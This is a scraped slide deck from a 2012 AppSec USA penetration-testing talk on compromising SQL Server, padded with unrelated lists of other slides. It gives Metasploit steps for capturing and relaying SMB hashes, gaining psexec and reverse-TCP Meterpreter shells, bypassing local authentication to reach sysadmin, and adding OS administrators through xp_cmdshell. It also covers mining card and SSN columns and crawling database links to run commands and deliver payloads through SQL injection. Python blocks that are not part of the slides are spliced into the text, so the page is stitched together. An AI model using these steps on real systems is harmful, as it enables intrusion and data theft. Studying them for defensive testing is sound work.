SQL Server Exploitation, Escalation, and Pilfering
                                  AppSec USA 2012

Authors:
Antti Rantasaari
Scott Sutherland
Who are we?

Antti Rantasaari

Scott Sutherland (@_nullbind)

What we do…
• Security consultants at NetSPI
• Pentesters
   ‒ Network
   ‒ Web
   ‒ Thick
• Researchers, bloggers, etc
• Pinball enthusiasts
What are we going to cover?

1.   Database entry points
2.   Domain user → Database user
3.   Database user → OS admin
4.   OS admin → Database admin
5.   Database admin → OS admin
6.   Finding sensitive data
7.   Escalation: Service accounts
8.   Escalation: Database Link Crawling
9.   Conclusions
Why target SQL Servers?

Pentest Goal = Data Access
• It’s deployed everywhere
• Very few “exploits”, but it’s commonly
  misconfigured
• Integrated with Windows and Active
  Directory authentication
• Easy and stable to exploit
Why develop Metasploit tools?

•   I suck at programming
•   Easy to use framework
•   Huge community support
•   Easy management of code (GitHub)
•   Easy distribution of code




http://www.metasploit.com/

https://github.com/rapid7/metasploit-framework
Let’s get started!
Entry Points: Summary
  Unauthenticated Options
  • SQL injections
  • Weak passwords

  Authenticated Options (usually)
  • Other database servers
  • Unencrypted connection
    strings:
     ‒ Files
     ‒ Registry
     ‒ Network
  • ODBC connections
  • Client tools (priv inheritance)
DOMAIN user → DATABASE user
                  Privilege Inheritance
Privilege Inheritance: Summary

The “Domain Users” group is often granted
privileges to log in to SQL Servers…

Evil users just need to:
• Find SQL Servers
• Verify Access
• Attack!
Privilege Inheritance: Find SQL Servers

 Easy SQL Server Discovery = SQLPing v3.0




   http://www.sqlsecurity.com/dotnetnuke/uploads/sqlping3.zip
Privilege Inheritance: Find SQL Servers

      Finding SQL Servers with osql:
Privilege Inheritance: Verify Access
Test current user’s access to SQL Servers with osql:

 FOR /F "tokens=*" %i in ('type sqlservers.txt') do osql -E -S %i -Q "select 'I have access to:'+@@servername"
Privilege Inheritance: Verify Access
Test an alternative user’s access to the SQL Servers with
         the mssql_sql Metasploit module:
   msfconsole
   use auxiliary/admin/mssql/mssql_sql
   set RHOST <IP RANGE>
   set RPORT <port>
   set USE_WINDOWS_AUTHENT true
   set DOMAIN <domain>
   set USERNAME <user>
   set PASSWORD <password>
   set SQL <query>
   run

       http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql
Privilege Inheritance: Verify Access
Privilege Inheritance: Verify Access
DATABASE USER → OS ADMIN
                SMB Capture/Relay
SMB Capture/Relay: Summary
 SQL Server supports functions that can access files via UNC
 paths using the privileges of the SQL Server service account.

 High level authentication process:
SMB Capture/Relay: Summary

  Stored procedures with UNC support:
      ‒ *xp_dirtree
      ‒ *xp_fileexist
      ‒ xp_getfiledetails

  Possible SMB authentication attacks:

  Service Account        Network Communication   SMB Capture   SMB Relay
  LocalSystem            Computer Account        Yes           No
  NetworkService         Computer Account        Yes           No
  *Local Administrator   Local Administrator     Yes           Yes
  *Domain User           Domain User             Yes           Yes
  *Domain Admin          Domain Admin            Yes           Yes

   http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/
http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/
SMB Capture: Diagram
SMB Capture: Start Sniffing for Hashes

 Start Metasploit SMB capture module on your
 evil server to capture seeded password hashes:
  msfconsole
  use auxiliary/server/capture/smb
  set CAINPWFILE /root/cain_hashes.txt
  set JOHNPWFILE /root/john_hashes.txt
  exploit




     http://www.metasploit.com/modules/auxiliary/server/capture/smb
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Capture: Force MS SQL to Auth

Force SQL Server to authenticate with the modules:
MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI

msfconsole
use auxiliary/admin/mssql/mssql_ntlm_stealer
set USE_WINDOWS_AUTHENT true
set DOMAIN <domain>
set USERNAME <user>
set PASSWORD <password>
set RHOSTS <IP RANGE>
set RPORT <port>
set SMBPROXY <evil server>
run
SMB Capture: Obtain Seeded Hashes

 Obtaining service account hashes from the SQL
 Server should look something like this:
  DOMAIN: DEMO
  USER: serviceaccount

  LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25

  NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e




     http://www.metasploit.com/modules/auxiliary/server/capture/smb
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Capture: Crack Hashes

 1. Crack the first half of the recovered LANMAN hash
    with the seeded half-LM rainbow tables:
        rcracki_mt -h 5e17a06b538a42ae ./halflmchall


 2. Crack the second half with John the Ripper
    to obtain the case-sensitive NTLM password:
        perl netntlm.pl --seed GPP4H1 --file /root/john_hashes.txt



     http://www.metasploit.com/modules/auxiliary/server/capture/smb
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Relay: Diagram

Very high level overview:




          http://en.wikipedia.org/wiki/SMBRelay
SMB Relay: Setup SMBProxy for Relay

SMB Relay to 3rd Party with the SMB_Relay
Metasploit exploit module:
msfconsole
use exploit/windows/smb/smb_relay
set SMBHOST <targetserver>
exploit

If the service account has local admin
privileges on the remote system, the smb_relay
module returns a shell.


 http://www.metasploit.com/modules/exploit/windows/smb/smb_relay
SMB Relay: Force MS SQL to Auth

Force SQL Server to authenticate with the modules
MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI
 msfconsole
 use auxiliary/admin/mssql/mssql_ntlm_stealer
 set USE_WINDOWS_AUTHENT true
 set DOMAIN <domain>
 set USERNAME <user>
 set PASSWORD <password>
 set RHOSTS <IP RANGE>
 set RPORT <port>
 set SMBPROXY <evil server>
 run
SMB Relay: Get Meterpreter Shells
SMB Capture/Relay: Using PW or Shell

If you have a Meterpreter session:
• Type: shell
• Type: osql -E -Q "whatever you want"

If you have a password:
• Sign in via RDP
• Open a cmd console
• osql -E -Q "whatever you want"
DEMO
Do a crazy dance!




BALLET = NOT CRAZY   DANCING FLY = TOTALLY CRAZY
OS ADMIN → DATABASE ADMIN
          SQL Server Local Authorization Bypass
Local Auth Bypass: Summary

How can we go from OS admin to DB
admin?
• SQL Server 2000 to 2008
  ‒ LocalSystem = Sysadmin privileges


• SQL Server 2012
  ‒ Must migrate to SQL Server service process
    for Sysadmin privileges
Local Auth Bypass: Summary



   Transparent Encryption
             =
       Mostly Useless
(unless local hard drive encryption is in place and key management is
                            done correctly)
Local Auth Bypass: Psexec

On SQL Server 2000 to 2008
Execute queries as sysadmin with osql:
psexec -s cmd.exe
osql -E -S "localhost\sqlexpress" -Q "select is_srvrolemember('sysadmin')"


Execute queries as sysadmin with SSMS:
psexec -i -s ssms



    http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
Local Auth Bypass: Get Shell

Obtain Meterpreter shell using the PSEXEC module
msfconsole
use exploit/windows/smb/psexec
set RHOST <targetserver>
set SMBDOMAIN .
set SMBUSER <user>
set SMBPASS <password>
exploit




  http://www.metasploit.com/modules/exploit/windows/smb/psexec
Local Auth Bypass: Get Sysadmin

     Create sysadmin in database using the Metasploit
     mssql_local_auth_bypass post module:

     In Meterpreter type “background” to return to
     msfconsole. Then, in the msfconsole type:
      use post/windows/manage/mssql_local_auth_bypass
      set session <session>
      set DB_USERNAME <username>
      set DB_PASSWORD <password>
      exploit



http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass
SQL Server Auth Bypass: Got Sysadmin
Do a crazy whale dance!




To the left…   To the right…   Now dive!
DATABASE ADMIN → OS ADMIN
                   xp_cmdshell
XP_CMDSHELL: Summary




 XP_CMDSHELL = OS COMMAND EXEC



Yes. We know you already know this, but
            don’t forget…
XP_CMDSHELL: Re-Install

Re-install xp_cmdshell
EXEC master..sp_addextendedproc "xp_cmdshell", "C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll";
XP_CMDSHELL: Re-Enable

Re-enable xp_cmdshell
sp_configure 'show advanced options', 1;
reconfigure;
go

sp_configure 'xp_cmdshell', 1;
reconfigure;
go
XP_CMDSHELL: Execute Commands

Add Local OS Administrator with
xp_cmdshell

EXEC master..xp_cmdshell 'net user myadmin MyP@sword1 /add'

EXEC master..xp_cmdshell 'net localgroup administrators /add myadmin'
FINDING DATA
Finding Data: Summary

GOAL = Find sensitive data!

•   Credit cards

•   Social security number

•   Medical records
Finding Data: TSQL Script

Simple keywords search via TSQL!
EXEC master..sp_msforeachdb
'SELECT @@Servername as Server_Name,''[?]'' as
Database_name,Table_Name,Column_Name
FROM [?].INFORMATION_SCHEMA.COLUMNS WHERE
Column_Name LIKE ''%password%''
OR Column_Name LIKE ''%Credit%''
OR Column_Name LIKE ''%CCN%''
OR Column_Name LIKE ''%Account%''
OR Column_Name LIKE ''%Social%''
OR Column_Name LIKE ''%SSN%''
ORDER BY Table_name'
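The keyword search above is hand-typed with one LIKE clause per keyword. As an added example (not the slide authors' script or the mssql_findandsampledata module), the generator below produces the same sp_msforeachdb statement from a Metasploit-style KEYWORDS value such as credit|social|password, escaping each keyword so a quote or a LIKE wildcard in the list can neither break the outer string nor silently match every column. The function names and the ESCAPE '\' convention are this example's own choices.

```python
# Added example, not from the slides or the Metasploit module. Generates
# the sp_msforeachdb column search from a Metasploit-style KEYWORDS value
# such as "credit|social|password". Each keyword is escaped for the LIKE
# clause and then quote-doubled for the outer sp_msforeachdb string.
import re

# LIKE wildcards (% _ [ ]) and the backslash used as the escape character.
_LIKE_SPECIALS = re.compile(r"([%_\[\]\\])")


def parse_keywords(keywords_value):
    """Split the pipe-separated KEYWORDS value, dropping empty entries."""
    return [w.strip() for w in keywords_value.split("|") if w.strip()]


def like_pattern(keyword):
    r"""Return the LIKE literal for a substring match on keyword, as it
    must appear INSIDE the single-quoted string passed to sp_msforeachdb.

    Wildcards are escaped for ESCAPE '\', quotes are doubled for the inner
    literal, and then every quote is doubled again because the whole
    query is itself one T-SQL string literal.
    """
    if "?" in keyword:
        # sp_msforeachdb substitutes the database name for every '?'
        raise ValueError("'?' is the sp_msforeachdb placeholder")
    escaped = _LIKE_SPECIALS.sub(r"\\\1", keyword).replace("'", "''")
    inner = "'%" + escaped + "%'"          # literal as the database runs it
    return inner.replace("'", "''")        # as it sits in the outer string


def build_search(keywords_value):
    """Return the EXEC master..sp_msforeachdb statement for the keywords."""
    words = parse_keywords(keywords_value)
    if not words:
        raise ValueError("KEYWORDS must contain at least one keyword")
    conds = " OR ".join(
        "Column_Name LIKE {} ESCAPE ''\\''".format(like_pattern(w)) for w in words
    )
    return (
        "EXEC master..sp_msforeachdb '"
        "SELECT @@Servername AS Server_Name, ''[?]'' AS Database_Name, "
        "Table_Name, Column_Name "
        "FROM [?].INFORMATION_SCHEMA.COLUMNS "
        "WHERE " + conds + " "
        "ORDER BY Table_Name'"
    )


if __name__ == "__main__":
    print(build_search("credit|social|password"))
```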
Finding Data: Metasploit Module

Database scraping with the
mssql_findandsampledata module!

Features
• Scan multiple servers
• Authenticate with local Windows, Domain
   or SQL credentials
• Sample data
• Number of records found
• Output to screen and CSV file

http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata
Finding Data: Metasploit Module

Launching mssql_findandsampledata:
msfconsole
use auxiliary/admin/mssql/mssql_findandsampledata
set RHOSTS <range>
set RPORT <port>
setg USE_WINDOWS_AUTHENT true
setg DOMAIN <CompanyDomain>
set USERNAME <username>
set PASSWORD <password>
set SAMPLE_SIZE <size>
set KEYWORDS credit|social|password
exploit
Finding Data: Module Output
Finding Data: Demo




          DEMO
Do a crazy cat disco dance!
Escalation: Service Accounts
Shared Service Accounts: Summary

         XP_CMDSHELL
                +
     Shared Service Accounts
                +
             OSQL -E
               =
(more) Unauthorized DATA access
Shared Service Accounts: Diagram
Shared Service Accounts: TSQL Script

XP_CMDSHELL + OSQL = MORE ACCESS!

EXEC master..xp_cmdshell 'osql -E -S HVA -Q "select super.secret.data"'




More examples:
http://www.netspi.com/blog/2011/07/19/when-databases-attack-hacking-with-the-osql-utility/
Escalation: Database Link Crawling
Database Link Crawling: Summary

Database Links
• Allow one database server to query another
• Often configured with excessive privileges
• Can be chained together
• Use openquery() to query linked servers
• Can be used to execute the infamous
  xp_cmdshell
• Tons of access, no credentials required (via SQL
  injection)
Database Link Crawling: Diagram
Database Link Crawling: List Links

How do I list linked servers?
Two common options:
sp_linkedservers
and
SELECT srvname FROM master..sysservers
Database Link Crawling: List Links

How do I list linked servers on a linked server?
SELECT srvname FROM
openquery(DB1, 'select srvname FROM
master..sysservers')
Database Link Crawling: List Links

How do I list linked servers on the linked
server’s linked server?
SELECT srvname FROM
openquery(DB1,'SELECT srvname FROM
openquery(HVA,''SELECT srvname FROM
master..sysservers'')')
Database Link Crawling: You Get it!

…You get the point.


You can follow links until you
run out.
Database Link Crawling: Exec Cmds

How do I run commands on a linked server?

SELECT * FROM
openquery(DB1,'SELECT * FROM
openquery(HVA,''SELECT 1;exec xp_cmdshell ''''ping
  192.168.1.1'''' '')')
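The slides build the nested openquery() by hand and note that you can follow links until you run out. As an added example (not the slide authors' code or their mssql_linkcrawler modules), the script below generates the nested statement for any chain of links, showing why the quotes double at each hop, and runs a breadth-first crawl that stops on cycles. The run_query callback, the TOPOLOGY dictionary and the server names are constructed stand-ins for a real connection; is_srvrolemember('sysadmin') is the same check the psexec slide uses, run here through a link to show what privilege the link carries.

```python
# Added example, not from the NetSPI slides or their Metasploit modules.
# Builds the nested openquery() statements the slides show for one, two,
# three ... hops, and crawls a link graph until the links run out.
# fake_run_query() and TOPOLOGY are constructed stand-ins for a real
# SQL Server connection; the link and server names are made up.
from collections import deque

LIST_LINKS = "SELECT srvname FROM master..sysservers"
# Run through a link, this reports the privilege the link itself carries.
SYSADMIN_CHECK = "SELECT is_srvrolemember('sysadmin') AS sa"


def quote_literal(sql):
    """Wrap sql as a T-SQL string literal, doubling embedded quotes."""
    return "'" + sql.replace("'", "''") + "'"


def nested_query(path, inner_sql=LIST_LINKS):
    """Wrap inner_sql in one openquery() per link in path (outermost first).

    Each extra hop doubles every quote already present: 1, 2, 4, 8 ...
    which is why the hand-written three-hop query on the slides is so
    hard to read, and why generating it beats typing it.
    """
    sql = inner_sql
    for link in reversed(path):
        sql = "SELECT * FROM openquery({},{})".format(link, quote_literal(sql))
    return sql


def crawl_links(run_query, start, max_depth=5):
    """Breadth-first crawl from start. run_query(path) must return the
    srvname rows that nested_query(path) returns on a real instance.
    Returns {server: path_of_links_used_to_reach_it}; a link back to a
    server already seen is recorded once and not followed again, so a
    cycle (DB1 -> SQL01 below) cannot loop the crawler forever.
    """
    reached = {start: ()}
    queue = deque([()])
    while queue:
        path = queue.popleft()
        if len(path) >= max_depth:
            continue
        for name in run_query(path):
            if name in reached:
                continue
            reached[name] = path + (name,)
            queue.append(path + (name,))
    return reached


# Constructed topology (not real hosts): each server's master..sysservers
# rows. The first row is the server itself, as on a real instance, and
# DB1 links back to SQL01, which would loop a naive crawler.
TOPOLOGY = {
    "SQL01": ["SQL01", "DB1"],
    "DB1": ["DB1", "HVA", "SQL01"],
    "HVA": ["HVA", "DB2"],
    "DB2": ["DB2"],
}


def fake_run_query(path):
    """Stand-in for executing nested_query(path) on SQL01; here each link
    name is assumed to equal the name of the server it points at."""
    server = path[-1] if path else "SQL01"
    return TOPOLOGY[server]


if __name__ == "__main__":
    for server, path in crawl_links(fake_run_query, "SQL01").items():
        print(server, "via", " -> ".join(path) or "(direct)")
        print("   ", nested_query(path, SYSADMIN_CHECK))
```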
Database Link Crawling: Modules

Two Modules
1. Direct connection
2. SQL Injection

Available for Download
• Not submitted to Metasploit trunk – Yet
• Downloads available from nullbind’s github
  ‒ mssql_linkcrawler.rb
  ‒ mssql_linkcrawler_sqli.rb
Database Link Crawling: Modules

• Features
  ‒ Crawl SQL Server database links
  ‒ Standard Crawl output
  ‒ Verbose Crawl output
  ‒ Output to CSV file
  ‒ Supports 32 and 64 bit Windows
  ‒ Global Metasploit payload deployment
  ‒ Targeted Metasploit payload deployment
  ‒ Payload deployment via powershell memory
    injection
Metasploit Module: Run multi/handler

Setup the multi/handler module:
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 443
set ExitOnSession false
exploit -j -z
Metasploit Module: Link Crawler

Setup the mssql_linkcrawler_sqli module:
use exploit/windows/mssql/mssql_linkcrawler_sqli
set GET_PATH /employee.asp?id=1;[SQLi];--
set type blind
set RHOST 192.168.1.100
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.130
set lport 443
set DisablePayloadHandler true
exploit
Database Link Crawling: Attack!
Database Link Chaining: Demo




         DEMO
Do a crazy cat disco dance!




      Yes. It warrants 2 disco cats!
Database Link Chaining: Modules

Current Constraints
• Cannot crawl through SQL Server 2000
• Cannot enable xp_cmdshell through links
• Cannot deliver payloads to systems without
  powershell (at the moment)
• Currently, the module leaves a powershell
  process running on exit
• Currently, doesn’t allow arbitrary query
  execution on linked servers
Conclusions




      configure all accounts with

   LEAST PRIVILEGE
            system accounts
            service accounts
           database accounts
          application accounts
Conclusions



                always

    VALIDATE INPUT
               web apps
               thick apps
              mobile apps
              web services
Conclusions



              Configure

      SMB SIGNING
Conclusions



              don’t do

         DRUGS
Questions

Antti Rantasaari
Email: antti.rantasaari@netspi.com

Scott Sutherland
Email: scott.sutherland@netspi.com
Blog: http://www.netspi.com/blog/author/ssutherland/
Github: http://www.github.com/nullbind/
Twitter: @_nullbind


Presentation Slides
http://www.slideshare.net/nullbind/sql-serverexploitationescalationandpilferingapp-secusa2012

 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
 
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360
 
Declaration of malWARe
Declaration of malWAReDeclaration of malWARe
Declaration of malWARe
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
 

Dernier

Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 

Dernier (20)

Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

  • 1. SQL Server Exploitation, Escalation, and Pilfering AppSec USA 2012 Authors: Antti Rantasaari Scott Sutherland
  • 2. Who are we? Antti Rantasaari Scott Sutherland (@_nullbind) What we do… • Security consultants at NetSPI • Pentesters ‒ Network ‒ Web ‒ Thick • Researchers, bloggers, etc • Pinball enthusiasts
  • 3. What are we going to cover?
    1. Database entry points
    2. Domain user → Database user
